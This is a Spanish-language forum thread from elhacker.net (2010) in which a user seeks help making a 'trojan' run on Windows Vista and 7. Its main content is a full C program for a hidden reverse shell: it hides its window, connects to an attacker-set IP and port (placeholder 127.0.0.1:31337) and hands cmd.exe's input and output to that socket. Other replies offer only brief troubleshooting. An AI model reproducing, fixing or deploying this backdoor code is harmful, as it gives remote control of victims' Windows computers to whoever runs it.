elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  [C] [!!! HELP !!!] ¿Troyanos en Windows Vista / 7? ¿Que cambia? [SIN RESOLVER]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: [C] [!!! HELP !!!] ¿Troyanos en Windows Vista / 7? ¿Que cambia? [SIN RESOLVER]  (Leído 6,326 veces)
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: [C] [HELP] ¿Troyanos en Windows Vista / 7? ¿Nos van a fastidar? ¿Que cambia?
« Respuesta #10 en: 23 Diciembre 2010, 16:01 pm »

Muchas gracias por responder, pero no me funciona.. Alguien tiene otra idea?

PD: De todos modos muchas gracias!


« Última modificación: 24 Diciembre 2010, 14:00 pm por Sagrini » En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
paju1986

Desconectado Desconectado

Mensajes: 117


http://www.albertinux.com


Ver Perfil WWW
Re: [C] [HELP] ¿Troyanos en Windows Vista / 7? ¿Que cambia? [24-12-10 Sin resolver]
« Respuesta #11 en: 24 Diciembre 2010, 16:57 pm »

Bueno yo utilizo las librerias Qt y ejecuto cosas con QProcess::execute(nombreprograma) pero tampoco me funciona, ¿Puede que todo esto esté relacionado con algún asunto de seguridad en Widnows?


En línea

Hacking, programación, tutoriales, software libre y mucho más en:
http://www.albertinux.com
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: [C] [HELP] ¿Troyanos en Windows Vista / 7? ¿Que cambia?
« Respuesta #12 en: 27 Diciembre 2010, 18:32 pm »

No, no funciona tampoco xD... Y mas que ser de seguridad Windows, creo que es la forma en la que se hace... no es correcta.
llevo 3 dias enteros con el problemita xD... podrian ayudarme?

Alguna otra respuestas?
Muchas gracias!



Pd: Feliz navidad!

Lh: No hagas doble post. Utiliza el botón modificar.


Bueno, alguien me puede decir al menos si le funciona en 7? Y en Vista? Y en XP SP3?
Necesito ayuda!!!

El code final es este... He probado a abrirlo como admin, y nada....
Alguna idea?

Bueno, que code usan ustedes en Vista / 7?

Código
  1. #include <time.h>
  2. #include <stdio.h>
  3. #include <stdlib.h>
  4. #include <string.h>
  5. #include <winsock2.h>
  6.  
  7. struct sockaddr_in host;
  8. SOCKET sockfd;
  9.  
  10.  
  11. int main (int argc, char *argv [])
  12. {
  13. ShowWindow (GetForegroundWindow (), SW_HIDE);
  14. WSADATA wsa;
  15. WSAStartup(MAKEWORD(2,2),&wsa);
  16.  
  17. host.sin_addr.s_addr = inet_addr ("127.0.0.1"); // A modificar!
  18. host.sin_port = htons (31337); //Igualmente!
  19. host.sin_family = AF_INET;
  20. memset (host.sin_zero, 0, 8);
  21.  
  22.        if ((sockfd = socket (2, 1, 0)) == -1) return 1;
  23.        while (connect (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr))) Sleep (1);
  24. PROCESS_INFORMATION info_proc;
  25. STARTUPINFO start_proc;
  26. memset(&start_proc,0,sizeof(start_proc));
  27. start_proc.cb=sizeof(start_proc);
  28. start_proc.dwFlags=STARTF_USESTDHANDLES;
  29. start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (HANDLE)sockfd;
  30. CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc);
  31.  
  32.        closesocket (sockfd);
  33.        return 0;
  34. }
  35.  
« Última modificación: 30 Diciembre 2010, 21:18 pm por Littlehorse » En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
La frecuencia de la interfaz en modo monitor parece que no cambia, pero CAMBIA
Wireless en Linux
gidiem 3 3,386 Último mensaje 26 Noviembre 2010, 21:28 pm
por zydas
¿Por que los troyanos no funcionan corectamente? [Windows Vista/7]
Análisis y Diseño de Malware
Garfield07 4 4,412 Último mensaje 29 Enero 2011, 13:34 pm
por xarlyuno
como se cambia el lenguaje en windows 7
Windows
gmpv 2 5,746 Último mensaje 14 Diciembre 2011, 22:59 pm
por Randomize
Windows Explorer cambia de nombre en Windows 8
Noticias
wolfbcn 2 1,980 Último mensaje 29 Junio 2012, 23:08 pm
por d(-_-)b
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines